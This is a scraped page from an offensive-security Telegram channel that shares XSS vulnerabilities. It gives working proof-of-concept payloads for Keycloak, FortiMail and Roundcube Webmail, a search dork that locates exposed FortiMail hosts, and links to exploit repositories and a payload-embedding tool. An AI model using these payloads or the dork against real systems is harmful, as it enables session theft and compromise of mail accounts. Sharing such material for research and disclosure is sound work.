APT
@APT_Notes
12.9K subscribers
550 photos
27 videos
24 files
890 links
This channel discusses:

— Offensive Security
— RedTeam
— Malware Research
— OSINT
— etc

Disclaimer:
t.me/APT_Notes/6

Chat Link:
t.me/APT_Notes_PublicChat
Download Telegram
About
Blog
Apps
Platform
Join
APT
12.9K subscribers
APT
Keycloak POST-based Reflected XSS

1. POST /auth/realms/master/clientsregistrations/openid-connect
2. Content-Type: application/json
3. Request {"<svg onload=alert(document.domain)>":1}
4. Unfiltered user-input in error message will triggered XSS

#bugbounty #keycloak #xss
496 views
APT
Pre-Auth Reflected XSS in MS Exchange (CVE-2021-41349)

https://github.com/httpvoid/CVE-Reverse/tree/master/CVE-2021-41349

#exchange #xss #cve
GitHub
CVE-Reverse/CVE-2021-41349 at master · httpvoid/CVE-Reverse
Contribute to httpvoid/CVE-Reverse development by creating an account on GitHub.
365 views
APT
Docem

A utility to embed XXE and XSS payloads in docx, odt, pptx, etc - any documents that is a zip archive with bunch of xml files inside.

https://github.com/whitel1st/docem

#xxe #xss #doc #file #upload
447 views
APT
Decoding PDF Injection

This article talks about PDF injection from scratch to the execution of XSS and SSRF via PDF injection.

https://medium.com/@urshilaravindran/pdf-injection-in-simple-words-8c399f92593c

#pdf #xss #ssrf #injection
Medium
Decoding PDF Injection
PDF injection was listed down in the top 10 web application hacking techniques of 2020 and still it appears to be one of the most…
543 views
APT
Bypassing HttpOnly

1. Why phpinfo
2. Stealing ci_session with info.php file
3. PoC

Research:
https://aleksikistauri.medium.com/bypassing-httponly-with-phpinfo-file-4e5a8b17129b

#web #httponly #phpinfo #xss
602 views
APT
Fortinet Fortimail 7.0.1 — Reflected Cross-Site Scripting (CVE-2021-43062)

An improper neutralization of input during web page generation vulnerability in FortiMail may allow an unauthenticated attacker to perform an XSS attack via crafted HTTP GET requests to the FortiGuard URI protection service.

PoC:
https://example/fmlurlsvc/?=&url=https%3A%2F%http://google.com%3CSvg%2Fonload%3Dalert(1)%3E

Payload:
https%3A%2F%http://google.com%3CSvg%2Fonload%3Dalert(1)%3E

Dork:
inurl:/fmlurlsvc/

#fortinet #forimail #xss
713 views
APT
🔥 Bitrix24 Multiple Vulnerabilities

Multiple high-risk vulnerabilities found in Bitrix24 v22.0.300. These include Remote Command Execution, Cross-Site Scripting, Prototype Pollution, Insecure File Access, and Denial of Service.

🌐 Details and PoC's:

🔗 CVE-2023-1713 (RCE)
🔗 CVE-2023-1714 (RCE)
🔗 CVE-2023-1715 (XSS)
🔗 CVE-2023-1717 (XSS)
🔗 CVE-2023-1718 (DoS)
🔗 CVE-2023-1719 (IDOR)

#bitrix24 #rce #xss #dos #idor
🔥16👍3❤‍🔥1
13.7K views
APT
⌨️ Roundcube Webmail Critical XSS

A critical Cross-Site Scripting (XSS) vulnerability has been found in Roundcube Webmail, enabling attackers to inject and execute arbitrary JavaScript upon viewing a malicious email. This vulnerability could lead to the theft of emails, contacts, and passwords, as well as unauthorized email sending from the victim's account.

🛠 PoC: 
<body title="bgcolor=foo" name="bar style=animation-name:progress-bar-stripes onanimationstart=alert(origin) foo=bar">  Foo </body>


🔗 Source:
https://www.sonarsource.com/blog/government-emails-at-risk-critical-cross-site-scripting-vulnerability-in-roundcube-webmail

#roundcube #xss #cve #poc
Please open Telegram to view this post
VIEW IN TELEGRAM
👍10🔥41
5.7K views